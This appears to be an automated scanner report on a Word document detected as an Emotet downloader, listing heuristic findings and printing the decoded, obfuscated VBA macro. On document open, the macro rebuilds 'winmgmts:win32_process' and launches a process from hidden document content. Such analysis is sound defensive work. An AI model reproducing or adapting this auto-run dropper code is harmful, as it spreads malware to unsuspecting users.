MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.EmotetRed0121-9822961-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.EmotetRed0121-9822961-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Npx4o6ysnquo_vp = CreateObject(I05vk2km1xd81jo8) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13140 bytes |
SHA-256: 9b820b2402def2f5ee5a5a3a44ae4d03778e1b1e351b3b609e3682fdcff76601 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
119 of 191 identifiers look randomly generated (e.g. 'T_6bipqiz5umxjq9r6') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Gci_56o45gw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
N6guhxeua4i79j
End Sub
Attribute VB_Name = "I_jtotl9qzr"
Attribute VB_Name = "Tuem7y_4cvap"
Function N6guhxeua4i79j()
On Error Resume Next
V1 = Ecl38z2wmq3yku + Gci_56o45gw.Content + N9ulsoz7m8jctsqe
GoTo HWQvGoFE
Dim KKHJBcAYE As Paragraph
Set stfuHfQc = JtPDWEB
For Each KKHJBcAYE In Gci_56o45gw.Paragraphs
Set tzJksCBJB = wEEdNs
If Left(KKHJBcAYE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
HWQvGoFE = KKHJBcAYE.Range.ListFormat.ListString
ElseIf InStr(KKHJBcAYE.Range.Text, "kkiew") > 1 Then
bvwPF = KKHJBcAYE.Range.Text
bvwPF = Replace(saw, "sjgwb", "hqkwjbjdasd" & HWQvGoFE)
KKHJBcAYE.Range.Text = bvwPF
Set KKHJBcAYE.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set VqxJYDBE = PBlWmzBI
Next KKHJBcAYE
HWQvGoFE:
U7 = "sg yw ahpsg yw ah"
O0k180c4ait = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
GoTo qIplW
Dim rsJLI As Paragraph
Set GjurWEEJF = LCEyFiCH
For Each rsJLI In Gci_56o45gw.Paragraphs
Set lLMpOYHGF = ilYrjJGAJ
If Left(rsJLI.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
qIplW = rsJLI.Range.ListFormat.ListString
ElseIf InStr(rsJLI.Range.Text, "kkiew") > 1 Then
vClZy = rsJLI.Range.Text
vClZy = Replace(saw, "sjgwb", "hqkwjbjdasd" & qIplW)
rsJLI.Range.Text = vClZy
Set rsJLI.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set vVvxqHGrs = dycxOGB
Next rsJLI
qIplW:
Eiw3em6pwe1 = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
GoTo jvPhFGkeE
Dim aTXZWf As Paragraph
Set yziTEHql = ADSJm
For Each aTXZWf In Gci_56o45gw.Paragraphs
Set fqOWEEXD = fmSIJH
If Left(aTXZWf.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
jvPhFGkeE = aTXZWf.Range.ListFormat.ListString
ElseIf InStr(aTXZWf.Range.Text, "kkiew") > 1 Then
AOxzVepIB = aTXZWf.Range.Text
AOxzVepIB = Replace(saw, "sjgwb", "hqkwjbjdasd" & jvPhFGkeE)
aTXZWf.Range.Text = AOxzVepIB
Set aTXZWf.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set ZiVzJG = ylZdW
Next aTXZWf
jvPhFGkeE:
Jgiewrnpnwjl9ry = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
GoTo lUqNfMjAH
Dim tMzYO As Paragraph
Set drPyBCB = gJXnJN
For Each tMzYO In Gci_56o45gw.Paragraphs
Set OyrpGEGR = FTtCoDc
If Left(tMzYO.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
lUqNfMjAH = tMzYO.Range.ListFormat.ListString
ElseIf InStr(tMzYO.Range.Text, "kkiew") > 1 Then
qdSxpB = tMzYO.Range.Text
qdSxpB = Replace(saw, "sjgwb", "hqkwjbjdasd" & lUqNfMjAH)
tMzYO.Range.Text = qdSxpB
Set tMzYO.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set TuPkG = JXMIDL
Next tMzYO
lUqNfMjAH:
R1i4k8w1zg90 = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"
GoTo VoTfINbT
Dim oZBJQq As Paragraph
Set FbBzB = RHzVDJuIO
For Each oZBJQq In Gci_56o45gw.Paragraphs
Set tHQgbISng = TOeEHSG
If Left(oZBJQq.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
VoTfINbT = oZBJQq.Range.ListFormat.ListString
ElseIf InStr(oZBJQq.Range.Text, "kkiew") > 1 Then
rnlgIs = oZBJQq.Range.Text
rnlgIs = Replace(saw, "sjgwb", "hqkwjbjdasd" & VoTfINbT)
oZBJQq.Range.Text = rnlgIs
Set oZBJQq.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set yUycfwFQH = cTCWAby
Next oZBJQq
VoTfINbT:
Xk8p_0a082jagmo = Jgiewrnpnwjl9ry + R1i4k8w1zg90 + Eiw3em6pwe1 + U7 + O0k180c4ait
GoTo ETZuAF
Dim pQjOMaHL As Paragraph
Set sWybazB = iLtsGUA
For Each pQjOMaHL In Gci_56o45gw.Paragraphs
Set bJqZvJ = BGsYGjXjA
If Left(pQjOMaHL.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
ETZuAF = pQjOMaHL.Range.ListFormat.ListString
ElseIf InStr(pQjOMaHL.Range.Text, "kkiew") > 1 Then
nKoHLZB = pQjOMaHL.Range.Text
nKoHLZB = Replace(saw, "sjgwb", "hqkwjbjdasd" & ETZuAF)
pQjOMaHL.Range.Text = nKoHLZB
Set pQjOMaHL.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set WUJvDAEC = xZClD
Next pQjOMaHL
ETZuAF:
I05vk2km1xd81jo8 = Rumvbdwr2xkslu7(Xk8p_0a082jagmo)
GoTo gemtRJp
Dim dNESDo As Paragraph
Set eQUuFDru = PKZwD
For Each dNESDo In Gci_56o45gw.Paragraphs
Set bWlCEGQ = zFFKL
If Left(dNESDo.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
gemtRJp = dNESDo.Range.ListFormat.ListString
ElseIf InStr(dNESDo.Range.Text, "kkiew") > 1 Then
eCzcG = dNESDo.Range.Text
eCzcG = Replace(saw, "sjgwb", "hqkwjbjdasd" & gemtRJp)
dNESDo.Range.Text = eCzcG
Set dNESDo.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set SCztLE = ifuqBj
Next dNESDo
gemtRJp:
Set Npx4o6ysnquo_vp = CreateObject(I05vk2km1xd81jo8)
GoTo UxOde
Dim odRwCEQ As Paragraph
Set GJznGAzC = kmGnE
For Each odRwCEQ In Gci_56o45gw.Paragraphs
Set fIRXnM = yKsempluE
If Left(odRwCEQ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
UxOde = odRwCEQ.Range.ListFormat.ListString
ElseIf InStr(odRwCEQ.Range.Text, "kkiew") > 1 Then
kCnsZK = odRwCEQ.Range.Text
kCnsZK = Replace(saw, "sjgwb", "hqkwjbjdasd" & UxOde)
odRwCEQ.Range.Text = kCnsZK
Set odRwCEQ.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set zjUfD = PEsXNwb
Next odRwCEQ
UxOde:
KK = Rumvbdwr2xkslu7(Mid(V1, (4), Len(V1)))
Npx4o6ysnquo_vp.Create KK, Z3yb8jsnr_7n, Gm7cs_w3sw295f
GoTo Vqihh
Dim ZTFizFGF As Paragraph
Set fjHRGQG = ngJGWB
For Each ZTFizFGF In Gci_56o45gw.Paragraphs
Set KiGeQBpA = hKGII
If Left(ZTFizFGF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
Vqihh = ZTFizFGF.Range.ListFormat.ListString
ElseIf InStr(ZTFizFGF.Range.Text, "kkiew") > 1 Then
YWLTZylNX = ZTFizFGF.Range.Text
YWLTZylNX = Replace(saw, "sjgwb", "hqkwjbjdasd" & Vqihh)
ZTFizFGF.Range.Text = YWLTZylNX
Set ZTFizFGF.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set GfGjAzGeR = awNaP
Next ZTFizFGF
Vqihh:
End Function
Function Rumvbdwr2xkslu7(Ao_3muwgh5wnf6u4)
On Error Resume Next
GoTo RTasDY
Dim zKaCwWFDJ As Paragraph
Set oEgsJiJ = OxXuIIFB
For Each zKaCwWFDJ In Gci_56o45gw.Paragraphs
Set AcZWjDIqE = BGEICNVJF
If Left(zKaCwWFDJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
RTasDY = zKaCwWFDJ.Range.ListFormat.ListString
ElseIf InStr(zKaCwWFDJ.Range.Text, "kkiew") > 1 Then
qrLQOF = zKaCwWFDJ.Range.Text
qrLQOF = Replace(saw, "sjgwb", "hqkwjbjdasd" & RTasDY)
zKaCwWFDJ.Range.Text = qrLQOF
Set zKaCwWFDJ.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set adZlYEtAI = NAYLFd
Next zKaCwWFDJ
RTasDY:
T_6bipqiz5umxjq9r6 = Ao_3muwgh5wnf6u4
GoTo oehBfBH
Dim tlCMF As Paragraph
Set HHcTAXdJD = bbhzkBgF
For Each tlCMF In Gci_56o45gw.Paragraphs
Set rQSGXCCJm = QfPpIYDWH
If Left(tlCMF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
oehBfBH = tlCMF.Range.ListFormat.ListString
ElseIf InStr(tlCMF.Range.Text, "kkiew") > 1 Then
GzKUJ = tlCMF.Range.Text
GzKUJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & oehBfBH)
tlCMF.Range.Text = GzKUJ
Set tlCMF.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set vevRJEC = gjqnBy
Next tlCMF
oehBfBH:
Y8jzmv5sdtytsh = Np0p7c9zsmfxy(T_6bipqiz5umxjq9r6)
GoTo PKQbOAp
Dim ERcyoJoAE As Paragraph
Set CZPcl = REKxGJ
For Each ERcyoJoAE In Gci_56o45gw.Paragraphs
Set NPyBQGAGX = KbqQGKcAI
If Left(ERcyoJoAE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
PKQbOAp = ERcyoJoAE.Range.ListFormat.ListString
ElseIf InStr(ERcyoJoAE.Range.Text, "kkiew") > 1 Then
jxnEAUKC = ERcyoJoAE.Range.Text
jxnEAUKC = Replace(saw, "sjgwb", "hqkwjbjdasd" & PKQbOAp)
ERcyoJoAE.Range.Text = jxnEAUKC
Set ERcyoJoAE.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set EhOCBCJ = acBgFwZ
Next ERcyoJoAE
PKQbOAp:
Rumvbdwr2xkslu7 = Y8jzmv5sdtytsh
GoTo HvniGCa
Dim vwBGxB As Paragraph
Set WSWeHw = okTyBh
For Each vwBGxB In Gci_56o45gw.Paragraphs
Set AyYHGdG = tJdPJH
If Left(vwBGxB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
HvniGCa = vwBGxB.Range.ListFormat.ListString
ElseIf InStr(vwBGxB.Range.Text, "kkiew") > 1 Then
lzgdCVJ = vwBGxB.Range.Text
lzgdCVJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & HvniGCa)
vwBGxB.Range.Text = lzgdCVJ
Set vwBGxB.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set NrYDKHEG = RiNMFj
Next vwBGxB
HvniGCa:
End Function
Function Np0p7c9zsmfxy(Cmig6whzurbqi)
GoTo jAVABQF
Dim JNfkj As Paragraph
Set tgjhdsf = BMbIJGHTD
For Each JNfkj In Gci_56o45gw.Paragraphs
Set ZFLxDGb = XICZyC
If Left(JNfkj.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
jAVABQF = JNfkj.Range.ListFormat.ListString
ElseIf InStr(JNfkj.Range.Text, "kkiew") > 1 Then
XJSiBs = JNfkj.Range.Text
XJSiBs = Replace(saw, "sjgwb", "hqkwjbjdasd" & jAVABQF)
JNfkj.Range.Text = XJSiBs
Set JNfkj.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set JakAh = JdFEHBDi
Next JNfkj
jAVABQF:
GoTo TXaZBF
Dim AhDZB As Paragraph
Set njcretF = vJkKCGAeq
For Each AhDZB In Gci_56o45gw.Paragraphs
Set NwftnNXBA = gPbBFsGHn
If Left(AhDZB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
TXaZBF = AhDZB.Range.ListFormat.ListString
ElseIf InStr(AhDZB.Range.Text, "kkiew") > 1 Then
yHrsJGLG = AhDZB.Range.Text
yHrsJGLG = Replace(saw, "sjgwb", "hqkwjbjdasd" & TXaZBF)
AhDZB.Range.Text = yHrsJGLG
Set AhDZB.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set DnLpUBDr = WXFEKIE
Next AhDZB
TXaZBF:
GoTo efUjA
Dim bqQxcLA As Paragraph
Set ZXaEIG = pcgpnTx
For Each bqQxcLA In Gci_56o45gw.Paragraphs
Set AdWGIbTH = LMWQBR
If Left(bqQxcLA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
efUjA = bqQxcLA.Range.ListFormat.ListString
ElseIf InStr(bqQxcLA.Range.Text, "kkiew") > 1 Then
UsEUVHGv = bqQxcLA.Range.Text
UsEUVHGv = Replace(saw, "sjgwb", "hqkwjbjdasd" & efUjA)
bqQxcLA.Range.Text = UsEUVHGv
Set bqQxcLA.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set DOKqFG = EYpZv
Next bqQxcLA
efUjA:
Np0p7c9zsmfxy = Replace(Cmig6whzurbqi, "sg yw ah", Bncek5vd5c0yonu_)
GoTo NZgEl
Dim SymDGBcJj As Paragraph
Set MkjIIE = DhTOiFICG
For Each SymDGBcJj In Gci_56o45gw.Paragraphs
Set xYdYH = OmJyG
If Left(SymDGBcJj.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
NZgEl = SymDGBcJj.Range.ListFormat.ListString
ElseIf InStr(SymDGBcJj.Range.Text, "kkiew") > 1 Then
CwagDCA = SymDGBcJj.Range.Text
CwagDCA = Replace(saw, "sjgwb", "hqkwjbjdasd" & NZgEl)
SymDGBcJj.Range.Text = CwagDCA
Set SymDGBcJj.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set hbAEBk = AlCbBP
Next SymDGBcJj
NZgEl:
GoTo UdnxDGCD
Dim tbKDM As Paragraph
Set tyXuGC = lxSOEGF
For Each tbKDM In Gci_56o45gw.Paragraphs
Set GcHmC = zQQpBQ
If Left(tbKDM.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
UdnxDGCD = tbKDM.Range.ListFormat.ListString
ElseIf InStr(tbKDM.Range.Text, "kkiew") > 1 Then
xDmOKFAr = tbKDM.Range.Text
xDmOKFAr = Replace(saw, "sjgwb", "hqkwjbjdasd" & UdnxDGCD)
tbKDM.Range.Text = xDmOKFAr
Set tbKDM.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set IFzjGXkh = SAPOJDZpI
Next tbKDM
UdnxDGCD:
GoTo NbelBt
Dim yZgdJvVP As Paragraph
Set iRLMFIi = LILWAWn
For Each yZgdJvVP In Gci_56o45gw.Paragraphs
Set XxBDn = OGfYn
If Left(yZgdJvVP.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
NbelBt = yZgdJvVP.Range.ListFormat.ListString
ElseIf InStr(yZgdJvVP.Range.Text, "kkiew") > 1 Then
lgLREAA = yZgdJvVP.Range.Text
lgLREAA = Replace(saw, "sjgwb", "hqkwjbjdasd" & NbelBt)
yZgdJvVP.Range.Text = lgLREAA
Set yZgdJvVP.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set HDpxEFk = XTsuJJ
Next yZgdJvVP
NbelBt:
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.